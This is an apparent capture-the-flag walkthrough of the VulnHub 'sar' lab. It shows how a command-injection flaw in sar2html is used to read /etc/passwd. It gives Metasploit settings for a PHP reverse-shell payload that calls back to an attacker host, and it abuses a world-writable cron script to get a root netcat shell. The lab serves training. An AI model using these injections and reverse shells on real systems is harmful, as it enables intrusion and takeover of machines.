Another walkthrough for the vulnhub machine “sar” which is an easy lab designed by the author to give a taste to the OSCP Labs. The challenge is simple just like any other CTF challenge where you identify two flags “user.txt” and “root.txt” with the help of your pentest skill.

Download from here: https://www.vulnhub.com/entry/sar-1,425/

Penetration Testing Methodologies

• Network Scanning
  • Netdiscover
  • Nmap
• Enumeration
  • Dirb
  • Exploit DB
  • Exploit
  • Metasploit for RCE
• Privilege Escalation
  • Abusing Cronjob
  • Abusing Writable file permission

Walkthrough

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.29.212.

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -A 192.168.29.212

hmmm!! So here I enumerate port 80 is only the single port open for HTTP service.

Enumeration

So I navigate to the web browser and explore the host IP and obtain the Apache default page.

Without wasting time, I run DIRB – for directory brute force attack for enumerating web directories and ran the following command:

dirb http://192.168.29.212

Luckily, I found robots.txt is available which may help me to move ahead.

So I explored the URL: http://192.168.29.212/robots.txt and found an entry for “sar2html” which is a web-based frontend for performance monitoring. It converts sar binary data to graphical format and keep historical data in its library.

I’ve browsed /sar2html in the web browser, and the resulting web page displays its default configuration along with version disclosure, which might help me find the exploit if available on the internet.

So, I looked up for its exploit and fortunately got an exploit link from the Exploit DB. As a result, the installed application was vulnerable to remote code execution.

With the help of the exploit listed above, we tried to run some arbitrary command and, as shown in the image below, we were able to execute system commands through a web URL.

http://192.168.29.212/sar2html/index.php?plot=; tail "/etc/passwd"

So, we try to run the URL above in the web browser to get the user account details and, as a result, we successfully get the desired output.

Exploitation

It was time to exploit this vulnerability by spawning the host machine shell so we required to prepare a malicious PHP code with the help of the Metasploit “Web Delivery” Module.

use/exploit/multi/script/web_delivery
set target 1 <php>
set lhost 192.168.29.208
set lport 4444
set payload php/meterpreter/reverse_tcp
exploit

This will generate a malicious PHP code which you’ll use for execution on the web URL as done above.

So, I copied the above malicious code and paste it inside the URL to get the back connection of the host through the URL execution.

Booom!!! We hit the goal and obtain the meterperter session the host machine, alone this we also find the 1^st flag user.txt flag inside /home/love/Desktop.

Privilege Escalation

Now, to hunt for the final flag that would be inside the / root directory, we need to get a high privilege shell. We eventually searched for crontabs and found the bash script “finally.sh” to be executed along with sudo as a cronjob for after every 5 minutes.

By peeping inside /var/www/html I found two bash scripts “finally.sh and write.sh” moreover the write.sh has ALL permissions to perform READ, WRITE and EXECUTE operation.

So, we read that finally.sh which is a bash script that will execute write.sh every 5 minutes as a cronjob. Now, this was the moment when we could abuse the weak configuration of a cronjob on finally.sh that has a link to the write.sh script that has ALL permission.

cd /var/www/html
cat finally.sh
cat write.sh

Since we can abuse write.sh file to execute a malicious file, therefore as I use pentest-monkey: php_reverse_shell in order to obtain a high privilege shell via netcat session.

So, I download the shell.php file inside /var/www/html and execute the following command to append a line inside the write.sh script to run the shell.php file.

On the other hand, I start the netcat listener and then waiting for the reverse connection. Since we know that the cronjob was scheduled to run finally.sh script at the end of 5 mint, this may help us to get the root shell.

As a result, we got the netcat session as root and get the root.txt script, finished the task.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here